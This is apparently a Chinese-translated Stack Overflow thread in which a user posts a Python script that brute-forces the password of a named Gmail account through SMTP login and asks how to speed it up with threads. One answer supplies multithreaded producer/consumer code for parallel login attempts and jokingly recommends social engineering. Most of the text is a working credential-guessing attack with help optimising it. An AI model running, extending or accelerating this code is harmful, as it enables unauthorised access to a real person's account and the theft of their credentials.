0

我花了很多时间为 gmail 制作这个暴力破解程序:

import smtplib
from itertools import permutations
import string
import time
import os
from datetime import datetime
allC=["a","b","c","d","e","f","g","h","i","j","k","l","m","n","o","p","q","r","s","t","u","v","w","x","y","z","0","1","2","3","4","5","6","7","8","9"]
num=1
allP=len(allC)**num
sumt=0
procent=0
while True:
   for i in permutations(allC, num):
      try :
          i="".join(i)
          server = smtplib.SMTP('smtp.gmail.com',587) 
          server.ehlo()
          server.starttls()
          server.ehlo()
          server.login('raslav.milutinovic@gmail.com',i)
          print str(datetime.now())
          print i
          break
          server.close()     
      except Exception,e:
          if 'Errno 11001' in e:
               input()
          pass
    sumt=sumt+1.00001
    procent=sumt/allP*100
    print "Level :",num
    print "Procent :",int(procent)



   num=num+1
   procent=0
   sumt=0
   allP=len(allC)**num

注意:缩进可能不正确但非常慢=每小时尝试 5000 次

我如何使用线程来测试更多而不是一个等时间?而且我也不打算用它来作恶……只是一个简单的学习项目

4

2 回答 2

1

这是 Python 的线程擅长的任务之一。

每当网络代码被阻塞时,其他线程就会运行。SO 上已经有帖子展示了如何以类似的方式将 urllib 与线程一起使用。

于 2012-06-18T22:31:10.057 回答
1

创建一个使用排列填充列表的生成器线程和从列表中获取值并测试它的多个其他线程:

from time import sleep
from threading import Thread
queue = []
done = False
num_consumers = 10

def generate():
    #the generator - fill queue with values and set a flag when done
    global queue, done
    for val in permutations(allc, num):
        if len(queue) > 100:
            sleep(0.5)
            continue
        queue.append(val)
    done = True

def consume():
    #the consumer - get a value from the queue and try to login
    global queue, done
    while queue or not done:
        if len(queue) == 0:
            sleep(0.05)
            continue
        try_login(queue.pop())

#create a generator and multiple consumer threads with the respective fcts
generator = Thread(target=generate)
consumers = [Thread(target=consume) for _ in range(num_consumers)]
#start the consumers and the generator
[c.start() for c in consumers]
generator.start()

这不是一个完整的方法 - 例如,queue.pop()可能应该包含在 try 语句中,因为尽管检查线程是否在 之后if但之前切换,但列表仍然可以是空的pop,您还需要优化睡眠值和数量消费者等。但最重要的是,它不会让你在黑客 gmail 方面走得太远——这应该是蛮力不可能的,因为他们在尝试太多失败后部署了验证码、IP 禁令和其他好东西。你最好的方法是社会工程:)

于 2012-06-18T23:42:57.440 回答